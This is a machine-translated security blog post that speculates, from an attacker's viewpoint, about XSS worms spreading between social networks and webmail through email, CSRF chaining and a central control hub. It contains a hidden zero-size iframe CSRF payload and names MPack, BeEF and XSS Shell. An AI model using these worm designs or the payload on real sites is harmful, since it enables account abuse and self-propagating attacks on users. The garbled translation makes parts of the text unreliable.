Cross-origin worms

From: 0x37 Security

These days, I analyzed the XSS and csrf vulnerabilities of several major websites and began to think about cross-origin worms. After modifying the ghost page in qz, I found the cross-origin bug in IE6. The impact of this vulnerability is not just as simple as Cookie Theft :). However, the cross-origin worm I will mention below has nothing to do with this bug, this article is purely yy.

The popularity of XSS worm is inseparable from the SNS network. The technology core is not the XMLHTTPRequest object. I wrote several SNS Network worm, if these worm can communicate with each other (break through the defects that cannot cross-origin), the harm will be greater and more interesting :). First, we need to clarify the survival conditions of the worm in the webx.0 world and how they breed (omitted ). There are many methods for communication between worm.

I. Mail-to-mail worm:

Email can be sent to each other. Mail worm can use this point to spread payload (XSS trap) to different email services. Of course, the payload is almost different at this time. For example, Sohu mail's XSS worm and QQ mail's XSS worm can be used by their communication channels to send emails to each other. The Dom logic of worm in these two different mail environments is certainly not the same, but basic functional modules can be shared, such as XMLHttpRequest objects and some basic user-defined functions, this cross-domain worm must be able to determine its own environment, which is very simple.

This is the simplest cross-origin Worm Model.

Ii. csrf worm:

Cross-origin worms in this mode borrow the csrf vulnerability. For example, I broke out an XSS worm on myspace.cn, and yeeyan.com has a very low-level csrf vulnerability. How can I bring MySpace threats to Yeeyan? In this case, you can add the following code to XSS worm on myspace.cn:

<IFRAME src = http://www.0x37.com/Project/csrf/do.asp? Csrf = Hangzhou) & ymsggroup = & ymsgee = 19076 & ymsgee_username = 19076 width = 0 Height = 0> </iframe>

If you send a simple request, you can:

I assume that myspace.cn and yeeyan.com have some cooperation relationship. Users often need the services provided by both of them and log on to the two SNS networks, then, when user a of MySpace is infected with XSS worm, it will send a csrf request to user B of Yeeyan (A and B are the same person in the real world ), then user B will automatically publish a message on Yeeyan. What if this message is an XSS trap? Or is it a csrf spoofing message for yeeyan.com? Haha, this is an art for how worms breed :).

Iii. Network horse hub:

This concept is also mentioned. Such a hub should not be restricted to the application of Trojan technology. An independent Web2.0 worm requires a control center to ensure that worm, which is unrelated to each other, can communicate with each other. The Network horse hub is the intermediate hub of this communication :). The Network horse hub should also implement real-time control over network horse and web worm. This is not complete, but not perfect. As I said, developing this hub requires combining complex server technologies. This is a development trend.

4. other communication methods:

A lot. I don't want to continue yy ......

Or that sentence: wangma hub is king. These tools, such as MPack toolkit, beef, and XSS shell, are quite good. As for cross-origin ...... Maybe it doesn't need to be so troublesome at all.